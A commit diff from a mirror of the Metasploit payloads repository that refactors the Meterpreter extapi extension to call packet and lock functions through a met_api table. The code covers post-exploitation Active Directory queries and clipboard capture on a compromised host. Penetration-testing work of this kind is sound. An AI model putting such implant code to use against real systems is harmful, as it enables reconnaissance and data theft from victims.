mirror of
https://github.com/rapid7/metasploit-payloads
synced 2025-03-24 18:16:24 +01:00
Finally removed delay loading from the last extension: extapi
This commit is contained in:
OJ
parent
4cd3a29319
commit
c8aa435b3c
c/meterpreter
source/extensions/extapi
adsi.cadsi_interface.cppclipboard.cextapi.cntds.cntds_jet.cpageantjacker.cservice.cwindow.cwmi.cwmi_interface.cpp
workspace/ext_server_extapi
@ -6,6 +6,7 @@
|
|||||||
#include "wshelpers.h"
|
#include "wshelpers.h"
|
||||||
#include "adsi.h"
|
#include "adsi.h"
|
||||||
#include "adsi_interface.h"
|
#include "adsi_interface.h"
|
||||||
|
#include "common_metapi.h"
|
||||||
|
|
||||||
/*! @brief The default page size to use when no page size is specified */
|
/*! @brief The default page size to use when no page size is specified */
|
||||||
#define DEFAULT_PAGE_SIZE 1000
|
#define DEFAULT_PAGE_SIZE 1000
|
||||||
@ -26,7 +27,7 @@ DWORD request_adsi_domain_query(Remote *remote, Packet *packet)
|
|||||||
LPWSTR* lpwFields = NULL;
|
LPWSTR* lpwFields = NULL;
|
||||||
DWORD fieldCount = 0;
|
DWORD fieldCount = 0;
|
||||||
DWORD fieldIndex = 0;
|
DWORD fieldIndex = 0;
|
||||||
Packet * response = packet_create_response(packet);
|
Packet * response = met_api->packet.create_response(packet);
|
||||||
Tlv fieldTlv;
|
Tlv fieldTlv;
|
||||||
DWORD maxResults;
|
DWORD maxResults;
|
||||||
DWORD pageSize;
|
DWORD pageSize;
|
||||||
@ -38,7 +39,7 @@ DWORD request_adsi_domain_query(Remote *remote, Packet *packet)
|
|||||||
BREAK_WITH_ERROR("[EXTAPI ADSI] Unable to create response packet", ERROR_OUTOFMEMORY);
|
BREAK_WITH_ERROR("[EXTAPI ADSI] Unable to create response packet", ERROR_OUTOFMEMORY);
|
||||||
}
|
}
|
||||||
|
|
||||||
lpValue = packet_get_tlv_value_string(packet, TLV_TYPE_EXT_ADSI_DOMAIN);
|
lpValue = met_api->packet.get_tlv_value_string(packet, TLV_TYPE_EXT_ADSI_DOMAIN);
|
||||||
dprintf("[EXTAPI ADSI] Domain: %s", lpValue);
|
dprintf("[EXTAPI ADSI] Domain: %s", lpValue);
|
||||||
dwResult = to_wide_string(lpValue, &lpwDomain);
|
dwResult = to_wide_string(lpValue, &lpwDomain);
|
||||||
if (dwResult != ERROR_SUCCESS)
|
if (dwResult != ERROR_SUCCESS)
|
||||||
@ -47,7 +48,7 @@ DWORD request_adsi_domain_query(Remote *remote, Packet *packet)
|
|||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
|
|
||||||
lpValue = packet_get_tlv_value_string(packet, TLV_TYPE_EXT_ADSI_FILTER);
|
lpValue = met_api->packet.get_tlv_value_string(packet, TLV_TYPE_EXT_ADSI_FILTER);
|
||||||
dprintf("[EXTAPI ADSI] Filter: %s", lpValue);
|
dprintf("[EXTAPI ADSI] Filter: %s", lpValue);
|
||||||
dwResult = to_wide_string(lpValue, &lpwFilter);
|
dwResult = to_wide_string(lpValue, &lpwFilter);
|
||||||
if (dwResult != ERROR_SUCCESS)
|
if (dwResult != ERROR_SUCCESS)
|
||||||
@ -56,10 +57,10 @@ DWORD request_adsi_domain_query(Remote *remote, Packet *packet)
|
|||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
|
|
||||||
maxResults = packet_get_tlv_value_uint(packet, TLV_TYPE_EXT_ADSI_MAXRESULTS);
|
maxResults = met_api->packet.get_tlv_value_uint(packet, TLV_TYPE_EXT_ADSI_MAXRESULTS);
|
||||||
dprintf("[EXTAPI ADSI] Max results will be %u", maxResults);
|
dprintf("[EXTAPI ADSI] Max results will be %u", maxResults);
|
||||||
|
|
||||||
pageSize = packet_get_tlv_value_uint(packet, TLV_TYPE_EXT_ADSI_PAGESIZE);
|
pageSize = met_api->packet.get_tlv_value_uint(packet, TLV_TYPE_EXT_ADSI_PAGESIZE);
|
||||||
dprintf("[EXTAPI ADSI] Page size specified as %u", pageSize);
|
dprintf("[EXTAPI ADSI] Page size specified as %u", pageSize);
|
||||||
|
|
||||||
// Set the page size to something sensible if not given.
|
// Set the page size to something sensible if not given.
|
||||||
@ -76,7 +77,7 @@ DWORD request_adsi_domain_query(Remote *remote, Packet *packet)
|
|||||||
}
|
}
|
||||||
dprintf("[EXTAPI ADSI] Page size will be %u", pageSize);
|
dprintf("[EXTAPI ADSI] Page size will be %u", pageSize);
|
||||||
|
|
||||||
while (packet_enum_tlv(packet, fieldCount, TLV_TYPE_EXT_ADSI_FIELD, &fieldTlv) == ERROR_SUCCESS)
|
while (met_api->packet.enum_tlv(packet, fieldCount, TLV_TYPE_EXT_ADSI_FIELD, &fieldTlv) == ERROR_SUCCESS)
|
||||||
{
|
{
|
||||||
lpValue = (char*)fieldTlv.buffer;
|
lpValue = (char*)fieldTlv.buffer;
|
||||||
dprintf("[EXTAPI ADSI] Field %u: %s", fieldCount, lpValue);
|
dprintf("[EXTAPI ADSI] Field %u: %s", fieldCount, lpValue);
|
||||||
@ -131,7 +132,7 @@ DWORD request_adsi_domain_query(Remote *remote, Packet *packet)
|
|||||||
dprintf("[EXTAPI ADSI] Transmitting response back to caller.");
|
dprintf("[EXTAPI ADSI] Transmitting response back to caller.");
|
||||||
if (response)
|
if (response)
|
||||||
{
|
{
|
||||||
packet_transmit_response(dwResult, remote, response);
|
met_api->packet.transmit_response(dwResult, remote, response);
|
||||||
}
|
}
|
||||||
|
|
||||||
return dwResult;
|
return dwResult;
|
||||||
|
|||||||
@ -5,6 +5,7 @@
|
|||||||
*/
|
*/
|
||||||
extern "C" {
|
extern "C" {
|
||||||
#include "extapi.h"
|
#include "extapi.h"
|
||||||
|
#include "common_metapi.h"
|
||||||
#include <Iads.h>
|
#include <Iads.h>
|
||||||
#include <Adshlp.h>
|
#include <Adshlp.h>
|
||||||
#include <AdsErr.h>
|
#include <AdsErr.h>
|
||||||
@ -186,7 +187,7 @@ DWORD domain_query(LPCWSTR lpwDomain, LPWSTR lpwFilter, LPWSTR* lpwQueryCols,
|
|||||||
DWORD dwIndex = 0;
|
DWORD dwIndex = 0;
|
||||||
ADS_SEARCH_COLUMN col;
|
ADS_SEARCH_COLUMN col;
|
||||||
|
|
||||||
Packet* pGroup = packet_create_group();
|
Packet* pGroup = met_api->packet.create_group();
|
||||||
|
|
||||||
// iterate through the columns, adding Tlv entries as we go, but only
|
// iterate through the columns, adding Tlv entries as we go, but only
|
||||||
// if we can get the values out.
|
// if we can get the values out.
|
||||||
@ -201,56 +202,56 @@ DWORD domain_query(LPCWSTR lpwDomain, LPWSTR lpwFilter, LPWSTR* lpwQueryCols,
|
|||||||
{
|
{
|
||||||
case ADSTYPE_LARGE_INTEGER:
|
case ADSTYPE_LARGE_INTEGER:
|
||||||
{
|
{
|
||||||
packet_add_tlv_qword(pGroup, TLV_TYPE_EXT_ADSI_BIGNUMBER, col.pADsValues->LargeInteger.QuadPart);
|
met_api->packet.add_tlv_qword(pGroup, TLV_TYPE_EXT_ADSI_BIGNUMBER, col.pADsValues->LargeInteger.QuadPart);
|
||||||
dprintf("[ADSI] Adding large int value %lld", (UINT)col.pADsValues->LargeInteger.QuadPart);
|
dprintf("[ADSI] Adding large int value %lld", (UINT)col.pADsValues->LargeInteger.QuadPart);
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
case ADSTYPE_INTEGER:
|
case ADSTYPE_INTEGER:
|
||||||
{
|
{
|
||||||
packet_add_tlv_uint(pGroup, TLV_TYPE_EXT_ADSI_NUMBER, col.pADsValues->Integer);
|
met_api->packet.add_tlv_uint(pGroup, TLV_TYPE_EXT_ADSI_NUMBER, col.pADsValues->Integer);
|
||||||
dprintf("[ADSI] Adding int value %u", (UINT)col.pADsValues->Integer);
|
dprintf("[ADSI] Adding int value %u", (UINT)col.pADsValues->Integer);
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
case ADSTYPE_DN_STRING:
|
case ADSTYPE_DN_STRING:
|
||||||
{
|
{
|
||||||
dprintf("[EXTAPI ADSI] DN String: %S", col.pADsValues->DNString);
|
dprintf("[EXTAPI ADSI] DN String: %S", col.pADsValues->DNString);
|
||||||
packet_add_tlv_wstring(pGroup, TLV_TYPE_EXT_ADSI_STRING, col.pADsValues->DNString);
|
met_api->packet.add_tlv_wstring(pGroup, TLV_TYPE_EXT_ADSI_STRING, col.pADsValues->DNString);
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
case ADSTYPE_PRINTABLE_STRING:
|
case ADSTYPE_PRINTABLE_STRING:
|
||||||
{
|
{
|
||||||
dprintf("[EXTAPI ADSI] Printable String: %S", col.pADsValues->PrintableString);
|
dprintf("[EXTAPI ADSI] Printable String: %S", col.pADsValues->PrintableString);
|
||||||
packet_add_tlv_wstring(pGroup, TLV_TYPE_EXT_ADSI_STRING, col.pADsValues->PrintableString);
|
met_api->packet.add_tlv_wstring(pGroup, TLV_TYPE_EXT_ADSI_STRING, col.pADsValues->PrintableString);
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
case ADSTYPE_NUMERIC_STRING:
|
case ADSTYPE_NUMERIC_STRING:
|
||||||
{
|
{
|
||||||
dprintf("[EXTAPI ADSI] Numeric String: %S", col.pADsValues->NumericString);
|
dprintf("[EXTAPI ADSI] Numeric String: %S", col.pADsValues->NumericString);
|
||||||
packet_add_tlv_wstring(pGroup, TLV_TYPE_EXT_ADSI_STRING, col.pADsValues->NumericString);
|
met_api->packet.add_tlv_wstring(pGroup, TLV_TYPE_EXT_ADSI_STRING, col.pADsValues->NumericString);
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
case ADSTYPE_CASE_EXACT_STRING:
|
case ADSTYPE_CASE_EXACT_STRING:
|
||||||
{
|
{
|
||||||
dprintf("[EXTAPI ADSI] Case Extact String: %S", col.pADsValues->CaseExactString);
|
dprintf("[EXTAPI ADSI] Case Extact String: %S", col.pADsValues->CaseExactString);
|
||||||
packet_add_tlv_wstring(pGroup, TLV_TYPE_EXT_ADSI_STRING, col.pADsValues->CaseExactString);
|
met_api->packet.add_tlv_wstring(pGroup, TLV_TYPE_EXT_ADSI_STRING, col.pADsValues->CaseExactString);
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
case ADSTYPE_CASE_IGNORE_STRING:
|
case ADSTYPE_CASE_IGNORE_STRING:
|
||||||
{
|
{
|
||||||
dprintf("[EXTAPI ADSI] Case Ignore String: %S", col.pADsValues->CaseIgnoreString);
|
dprintf("[EXTAPI ADSI] Case Ignore String: %S", col.pADsValues->CaseIgnoreString);
|
||||||
packet_add_tlv_wstring(pGroup, TLV_TYPE_EXT_ADSI_STRING, col.pADsValues->CaseIgnoreString);
|
met_api->packet.add_tlv_wstring(pGroup, TLV_TYPE_EXT_ADSI_STRING, col.pADsValues->CaseIgnoreString);
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
case ADSTYPE_BOOLEAN:
|
case ADSTYPE_BOOLEAN:
|
||||||
{
|
{
|
||||||
dprintf("[EXTAPI ADSI] Boolean");
|
dprintf("[EXTAPI ADSI] Boolean");
|
||||||
packet_add_tlv_bool(pGroup, TLV_TYPE_EXT_ADSI_BOOL, col.pADsValues->Boolean == 0 ? FALSE : TRUE);
|
met_api->packet.add_tlv_bool(pGroup, TLV_TYPE_EXT_ADSI_BOOL, col.pADsValues->Boolean == 0 ? FALSE : TRUE);
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
case ADSTYPE_OCTET_STRING:
|
case ADSTYPE_OCTET_STRING:
|
||||||
{
|
{
|
||||||
dprintf("[EXTAPI ADSI] Octet string");
|
dprintf("[EXTAPI ADSI] Octet string");
|
||||||
packet_add_tlv_raw(pGroup, TLV_TYPE_EXT_ADSI_RAW, col.pADsValues->OctetString.lpValue, col.pADsValues->OctetString.dwLength);
|
met_api->packet.add_tlv_raw(pGroup, TLV_TYPE_EXT_ADSI_RAW, col.pADsValues->OctetString.lpValue, col.pADsValues->OctetString.dwLength);
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
case ADSTYPE_UTC_TIME:
|
case ADSTYPE_UTC_TIME:
|
||||||
@ -259,54 +260,54 @@ DWORD domain_query(LPCWSTR lpwDomain, LPWSTR lpwFilter, LPWSTR* lpwQueryCols,
|
|||||||
SYSTEMTIME* pt = &col.pADsValues->UTCTime;
|
SYSTEMTIME* pt = &col.pADsValues->UTCTime;
|
||||||
sprintf_s(value, VALUE_SIZE, "%4u-%02u-%02u %02u:%02u:%02u.%03u",
|
sprintf_s(value, VALUE_SIZE, "%4u-%02u-%02u %02u:%02u:%02u.%03u",
|
||||||
pt->wYear, pt->wMonth, pt->wDay, pt->wHour, pt->wMinute, pt->wSecond, pt->wMilliseconds);
|
pt->wYear, pt->wMonth, pt->wDay, pt->wHour, pt->wMinute, pt->wSecond, pt->wMilliseconds);
|
||||||
packet_add_tlv_string(pGroup, TLV_TYPE_EXT_ADSI_STRING, value);
|
met_api->packet.add_tlv_string(pGroup, TLV_TYPE_EXT_ADSI_STRING, value);
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
case ADSTYPE_PROV_SPECIFIC:
|
case ADSTYPE_PROV_SPECIFIC:
|
||||||
{
|
{
|
||||||
dprintf("[EXTAPI ADSI] Provider specific");
|
dprintf("[EXTAPI ADSI] Provider specific");
|
||||||
packet_add_tlv_raw(pGroup, TLV_TYPE_EXT_ADSI_RAW, col.pADsValues->ProviderSpecific.lpValue, col.pADsValues->ProviderSpecific.dwLength);
|
met_api->packet.add_tlv_raw(pGroup, TLV_TYPE_EXT_ADSI_RAW, col.pADsValues->ProviderSpecific.lpValue, col.pADsValues->ProviderSpecific.dwLength);
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
case ADSTYPE_OBJECT_CLASS:
|
case ADSTYPE_OBJECT_CLASS:
|
||||||
{
|
{
|
||||||
packet_add_tlv_wstring(pGroup, TLV_TYPE_EXT_ADSI_STRING, col.pADsValues->ClassName);
|
met_api->packet.add_tlv_wstring(pGroup, TLV_TYPE_EXT_ADSI_STRING, col.pADsValues->ClassName);
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
case ADSTYPE_CASEIGNORE_LIST:
|
case ADSTYPE_CASEIGNORE_LIST:
|
||||||
{
|
{
|
||||||
// list of strings, yay!
|
// list of strings, yay!
|
||||||
Packet* pStrings = packet_create_group();
|
Packet* pStrings = met_api->packet.create_group();
|
||||||
PADS_CASEIGNORE_LIST list = col.pADsValues->pCaseIgnoreList;
|
PADS_CASEIGNORE_LIST list = col.pADsValues->pCaseIgnoreList;
|
||||||
|
|
||||||
dprintf("[EXTAPI ADSI] Case Ignore List");
|
dprintf("[EXTAPI ADSI] Case Ignore List");
|
||||||
|
|
||||||
while (list != NULL)
|
while (list != NULL)
|
||||||
{
|
{
|
||||||
packet_add_tlv_wstring(pStrings, TLV_TYPE_EXT_ADSI_STRING, list->String);
|
met_api->packet.add_tlv_wstring(pStrings, TLV_TYPE_EXT_ADSI_STRING, list->String);
|
||||||
list = list->Next;
|
list = list->Next;
|
||||||
}
|
}
|
||||||
|
|
||||||
packet_add_group(pGroup, TLV_TYPE_EXT_ADSI_ARRAY, pStrings);
|
met_api->packet.add_group(pGroup, TLV_TYPE_EXT_ADSI_ARRAY, pStrings);
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
case ADSTYPE_PATH:
|
case ADSTYPE_PATH:
|
||||||
{
|
{
|
||||||
PADS_PATH path = col.pADsValues->pPath;
|
PADS_PATH path = col.pADsValues->pPath;
|
||||||
Packet* pPathGroup = packet_create_group();
|
Packet* pPathGroup = met_api->packet.create_group();
|
||||||
|
|
||||||
dprintf("[EXTAPI ADSI] PATH");
|
dprintf("[EXTAPI ADSI] PATH");
|
||||||
|
|
||||||
packet_add_tlv_wstring(pPathGroup, TLV_TYPE_EXT_ADSI_PATH_VOL, path->VolumeName);
|
met_api->packet.add_tlv_wstring(pPathGroup, TLV_TYPE_EXT_ADSI_PATH_VOL, path->VolumeName);
|
||||||
packet_add_tlv_wstring(pPathGroup, TLV_TYPE_EXT_ADSI_PATH_PATH, path->Path);
|
met_api->packet.add_tlv_wstring(pPathGroup, TLV_TYPE_EXT_ADSI_PATH_PATH, path->Path);
|
||||||
packet_add_tlv_uint(pPathGroup, TLV_TYPE_EXT_ADSI_PATH_TYPE, path->Type);
|
met_api->packet.add_tlv_uint(pPathGroup, TLV_TYPE_EXT_ADSI_PATH_TYPE, path->Type);
|
||||||
|
|
||||||
packet_add_group(pGroup, TLV_TYPE_EXT_ADSI_PATH, pPathGroup);
|
met_api->packet.add_group(pGroup, TLV_TYPE_EXT_ADSI_PATH, pPathGroup);
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
case ADSTYPE_POSTALADDRESS:
|
case ADSTYPE_POSTALADDRESS:
|
||||||
{
|
{
|
||||||
Packet* pAddressGroup = packet_create_group();
|
Packet* pAddressGroup = met_api->packet.create_group();
|
||||||
PADS_POSTALADDRESS addr = col.pADsValues->pPostalAddress;
|
PADS_POSTALADDRESS addr = col.pADsValues->pPostalAddress;
|
||||||
|
|
||||||
for (DWORD i = 0; i < sizeof(addr->PostalAddress) / sizeof(addr->PostalAddress[0]); ++i)
|
for (DWORD i = 0; i < sizeof(addr->PostalAddress) / sizeof(addr->PostalAddress[0]); ++i)
|
||||||
@ -316,33 +317,33 @@ DWORD domain_query(LPCWSTR lpwDomain, LPWSTR lpwFilter, LPWSTR* lpwQueryCols,
|
|||||||
continue;
|
continue;
|
||||||
}
|
}
|
||||||
|
|
||||||
packet_add_tlv_wstring(pAddressGroup, TLV_TYPE_EXT_ADSI_STRING, addr->PostalAddress[i]);
|
met_api->packet.add_tlv_wstring(pAddressGroup, TLV_TYPE_EXT_ADSI_STRING, addr->PostalAddress[i]);
|
||||||
}
|
}
|
||||||
|
|
||||||
dprintf("[EXTAPI ADSI] postal address list");
|
dprintf("[EXTAPI ADSI] postal address list");
|
||||||
|
|
||||||
packet_add_group(pGroup, TLV_TYPE_EXT_ADSI_ARRAY, pAddressGroup);
|
met_api->packet.add_group(pGroup, TLV_TYPE_EXT_ADSI_ARRAY, pAddressGroup);
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
case ADSTYPE_TIMESTAMP:
|
case ADSTYPE_TIMESTAMP:
|
||||||
{
|
{
|
||||||
ADS_TIMESTAMP* pts = &col.pADsValues->Timestamp;
|
ADS_TIMESTAMP* pts = &col.pADsValues->Timestamp;
|
||||||
dprintf("[EXTAPI ADSI] timestamp");
|
dprintf("[EXTAPI ADSI] timestamp");
|
||||||
packet_add_tlv_uint(pGroup, TLV_TYPE_EXT_ADSI_NUMBER, pts->WholeSeconds);
|
met_api->packet.add_tlv_uint(pGroup, TLV_TYPE_EXT_ADSI_NUMBER, pts->WholeSeconds);
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
case ADSTYPE_BACKLINK:
|
case ADSTYPE_BACKLINK:
|
||||||
{
|
{
|
||||||
ADS_BACKLINK* pbl = &col.pADsValues->BackLink;
|
ADS_BACKLINK* pbl = &col.pADsValues->BackLink;
|
||||||
dprintf("[EXTAPI ADSI] backlink");
|
dprintf("[EXTAPI ADSI] backlink");
|
||||||
packet_add_tlv_wstring(pGroup, TLV_TYPE_EXT_ADSI_STRING, pbl->ObjectName);
|
met_api->packet.add_tlv_wstring(pGroup, TLV_TYPE_EXT_ADSI_STRING, pbl->ObjectName);
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
case ADSTYPE_TYPEDNAME:
|
case ADSTYPE_TYPEDNAME:
|
||||||
{
|
{
|
||||||
PADS_TYPEDNAME ptn = col.pADsValues->pTypedName;
|
PADS_TYPEDNAME ptn = col.pADsValues->pTypedName;
|
||||||
dprintf("[EXTAPI ADSI] typed name");
|
dprintf("[EXTAPI ADSI] typed name");
|
||||||
packet_add_tlv_wstring(pGroup, TLV_TYPE_EXT_ADSI_STRING, ptn->ObjectName);
|
met_api->packet.add_tlv_wstring(pGroup, TLV_TYPE_EXT_ADSI_STRING, ptn->ObjectName);
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
case ADSTYPE_NETADDRESS:
|
case ADSTYPE_NETADDRESS:
|
||||||
@ -353,12 +354,12 @@ DWORD domain_query(LPCWSTR lpwDomain, LPWSTR lpwFilter, LPWSTR* lpwQueryCols,
|
|||||||
char* s = bytes_to_string(pna->Address, pna->AddressLength, "%u", 3, ".");
|
char* s = bytes_to_string(pna->Address, pna->AddressLength, "%u", 3, ".");
|
||||||
if (s)
|
if (s)
|
||||||
{
|
{
|
||||||
packet_add_tlv_string(pGroup, TLV_TYPE_EXT_ADSI_STRING, s);
|
met_api->packet.add_tlv_string(pGroup, TLV_TYPE_EXT_ADSI_STRING, s);
|
||||||
free(s);
|
free(s);
|
||||||
}
|
}
|
||||||
else
|
else
|
||||||
{
|
{
|
||||||
packet_add_tlv_raw(pGroup, TLV_TYPE_EXT_ADSI_RAW, pna->Address, pna->AddressLength);
|
met_api->packet.add_tlv_raw(pGroup, TLV_TYPE_EXT_ADSI_RAW, pna->Address, pna->AddressLength);
|
||||||
}
|
}
|
||||||
dprintf("[ADSI] %u network address of %u bytes added", pna->AddressType, pna->AddressLength);
|
dprintf("[ADSI] %u network address of %u bytes added", pna->AddressType, pna->AddressLength);
|
||||||
break;
|
break;
|
||||||
@ -366,7 +367,7 @@ DWORD domain_query(LPCWSTR lpwDomain, LPWSTR lpwFilter, LPWSTR* lpwQueryCols,
|
|||||||
case ADSTYPE_EMAIL:
|
case ADSTYPE_EMAIL:
|
||||||
{
|
{
|
||||||
dprintf("[EXTAPI ADSI] email");
|
dprintf("[EXTAPI ADSI] email");
|
||||||
packet_add_tlv_wstring(pGroup, TLV_TYPE_EXT_ADSI_STRING, col.pADsValues->Email.Address);
|
met_api->packet.add_tlv_wstring(pGroup, TLV_TYPE_EXT_ADSI_STRING, col.pADsValues->Email.Address);
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
case ADSTYPE_NT_SECURITY_DESCRIPTOR:
|
case ADSTYPE_NT_SECURITY_DESCRIPTOR:
|
||||||
@ -376,39 +377,39 @@ DWORD domain_query(LPCWSTR lpwDomain, LPWSTR lpwFilter, LPWSTR* lpwQueryCols,
|
|||||||
if(ConvertSidToStringSid((PSID)psd->lpValue, &s))
|
if(ConvertSidToStringSid((PSID)psd->lpValue, &s))
|
||||||
{
|
{
|
||||||
dprintf("[EXTAPI ADSI] converted SID: %s", s);
|
dprintf("[EXTAPI ADSI] converted SID: %s", s);
|
||||||
packet_add_tlv_string(pGroup, TLV_TYPE_EXT_ADSI_STRING, s);
|
met_api->packet.add_tlv_string(pGroup, TLV_TYPE_EXT_ADSI_STRING, s);
|
||||||
LocalFree(s);
|
LocalFree(s);
|
||||||
}
|
}
|
||||||
else
|
else
|
||||||
{
|
{
|
||||||
dprintf("[EXTAPI ADSI] byte SID");
|
dprintf("[EXTAPI ADSI] byte SID");
|
||||||
packet_add_tlv_raw(pGroup, TLV_TYPE_EXT_ADSI_RAW, psd->lpValue, psd->dwLength);
|
met_api->packet.add_tlv_raw(pGroup, TLV_TYPE_EXT_ADSI_RAW, psd->lpValue, psd->dwLength);
|
||||||
}
|
}
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
case ADSTYPE_DN_WITH_BINARY:
|
case ADSTYPE_DN_WITH_BINARY:
|
||||||
{
|
{
|
||||||
Packet* pDnGroup = packet_create_group();
|
Packet* pDnGroup = met_api->packet.create_group();
|
||||||
PADS_DN_WITH_BINARY pdb = col.pADsValues->pDNWithBinary;
|
PADS_DN_WITH_BINARY pdb = col.pADsValues->pDNWithBinary;
|
||||||
|
|
||||||
dprintf("[ADSI] DN with string");
|
dprintf("[ADSI] DN with string");
|
||||||
|
|
||||||
packet_add_tlv_wstring(pDnGroup, TLV_TYPE_EXT_ADSI_STRING, pdb->pszDNString);
|
met_api->packet.add_tlv_wstring(pDnGroup, TLV_TYPE_EXT_ADSI_STRING, pdb->pszDNString);
|
||||||
packet_add_tlv_raw(pDnGroup, TLV_TYPE_EXT_ADSI_RAW, pdb->lpBinaryValue, pdb->dwLength);
|
met_api->packet.add_tlv_raw(pDnGroup, TLV_TYPE_EXT_ADSI_RAW, pdb->lpBinaryValue, pdb->dwLength);
|
||||||
packet_add_group(pGroup, TLV_TYPE_EXT_ADSI_DN, pDnGroup);
|
met_api->packet.add_group(pGroup, TLV_TYPE_EXT_ADSI_DN, pDnGroup);
|
||||||
|
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
case ADSTYPE_DN_WITH_STRING:
|
case ADSTYPE_DN_WITH_STRING:
|
||||||
{
|
{
|
||||||
Packet* pDnGroup = packet_create_group();
|
Packet* pDnGroup = met_api->packet.create_group();
|
||||||
PADS_DN_WITH_STRING pds = col.pADsValues->pDNWithString;
|
PADS_DN_WITH_STRING pds = col.pADsValues->pDNWithString;
|
||||||
|
|
||||||
dprintf("[ADSI] DN with string");
|
dprintf("[ADSI] DN with string");
|
||||||
|
|
||||||
packet_add_tlv_wstring(pDnGroup, TLV_TYPE_EXT_ADSI_STRING, pds->pszDNString);
|
met_api->packet.add_tlv_wstring(pDnGroup, TLV_TYPE_EXT_ADSI_STRING, pds->pszDNString);
|
||||||
packet_add_tlv_wstring(pDnGroup, TLV_TYPE_EXT_ADSI_STRING, pds->pszStringValue);
|
met_api->packet.add_tlv_wstring(pDnGroup, TLV_TYPE_EXT_ADSI_STRING, pds->pszStringValue);
|
||||||
packet_add_group(pGroup, TLV_TYPE_EXT_ADSI_DN, pDnGroup);
|
met_api->packet.add_group(pGroup, TLV_TYPE_EXT_ADSI_DN, pDnGroup);
|
||||||
|
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
@ -419,7 +420,7 @@ DWORD domain_query(LPCWSTR lpwDomain, LPWSTR lpwFilter, LPWSTR* lpwQueryCols,
|
|||||||
// this is a string of some kind
|
// this is a string of some kind
|
||||||
dprintf("[ADSI] Unhandled ADSI type %u (%x), adding unknown", col.dwADsType, col.dwADsType);
|
dprintf("[ADSI] Unhandled ADSI type %u (%x), adding unknown", col.dwADsType, col.dwADsType);
|
||||||
sprintf_s(value, VALUE_SIZE, "(unhandled ADSI type %u)", col.dwADsType);
|
sprintf_s(value, VALUE_SIZE, "(unhandled ADSI type %u)", col.dwADsType);
|
||||||
packet_add_tlv_string(pGroup, TLV_TYPE_EXT_ADSI_STRING, value);
|
met_api->packet.add_tlv_string(pGroup, TLV_TYPE_EXT_ADSI_STRING, value);
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@ -429,7 +430,7 @@ DWORD domain_query(LPCWSTR lpwDomain, LPWSTR lpwFilter, LPWSTR* lpwQueryCols,
|
|||||||
else
|
else
|
||||||
{
|
{
|
||||||
dprintf("[ADSI] Col read failed: %x", hr);
|
dprintf("[ADSI] Col read failed: %x", hr);
|
||||||
packet_add_tlv_string(pGroup, TLV_TYPE_EXT_ADSI_STRING, "");
|
met_api->packet.add_tlv_string(pGroup, TLV_TYPE_EXT_ADSI_STRING, "");
|
||||||
}
|
}
|
||||||
|
|
||||||
dwIndex++;
|
dwIndex++;
|
||||||
@ -439,7 +440,7 @@ DWORD domain_query(LPCWSTR lpwDomain, LPWSTR lpwFilter, LPWSTR* lpwQueryCols,
|
|||||||
{
|
{
|
||||||
dprintf("[ADSI] Adding group packet of %u values", dwIndex);
|
dprintf("[ADSI] Adding group packet of %u values", dwIndex);
|
||||||
// Throw the user details together in a group, ready to return.
|
// Throw the user details together in a group, ready to return.
|
||||||
packet_add_group(response, TLV_TYPE_EXT_ADSI_RESULT, pGroup);
|
met_api->packet.add_group(response, TLV_TYPE_EXT_ADSI_RESULT, pGroup);
|
||||||
dprintf("[ADSI] Added group packet of %u values", dwIndex);
|
dprintf("[ADSI] Added group packet of %u values", dwIndex);
|
||||||
}
|
}
|
||||||
else
|
else
|
||||||
|
|||||||
@ -3,7 +3,8 @@
|
|||||||
* @brief Definitions for clipboard interaction functionality.
|
* @brief Definitions for clipboard interaction functionality.
|
||||||
*/
|
*/
|
||||||
#include "extapi.h"
|
#include "extapi.h"
|
||||||
#include "../../common/thread.h"
|
#include "common.h"
|
||||||
|
#include "common_metapi.h"
|
||||||
#include "clipboard.h"
|
#include "clipboard.h"
|
||||||
#include "clipboard_image.h"
|
#include "clipboard_image.h"
|
||||||
|
|
||||||
@ -300,7 +301,7 @@ VOID destroy_clipboard_monitor_capture(ClipboardCaptureList* pCaptureList, BOOL
|
|||||||
|
|
||||||
if (bRemoveLock && pCaptureList->pClipboardCaptureLock)
|
if (bRemoveLock && pCaptureList->pClipboardCaptureLock)
|
||||||
{
|
{
|
||||||
lock_destroy(pCaptureList->pClipboardCaptureLock);
|
met_api->lock.destroy(pCaptureList->pClipboardCaptureLock);
|
||||||
pCaptureList->pClipboardCaptureLock = NULL;
|
pCaptureList->pClipboardCaptureLock = NULL;
|
||||||
}
|
}
|
||||||
|
|
||||||
@ -331,7 +332,7 @@ VOID timestamp_to_string(SYSTEMTIME* pTime, char buffer[40])
|
|||||||
VOID dump_clipboard_capture(Packet* pResponse, ClipboardCapture* pCapture, BOOL bCaptureImageData)
|
VOID dump_clipboard_capture(Packet* pResponse, ClipboardCapture* pCapture, BOOL bCaptureImageData)
|
||||||
{
|
{
|
||||||
ClipboardFile* pFile;
|
ClipboardFile* pFile;
|
||||||
Packet* group = packet_create_group();
|
Packet* group = met_api->packet.create_group();
|
||||||
TlvType groupType;
|
TlvType groupType;
|
||||||
Packet* file = NULL;
|
Packet* file = NULL;
|
||||||
char timestamp[40];
|
char timestamp[40];
|
||||||
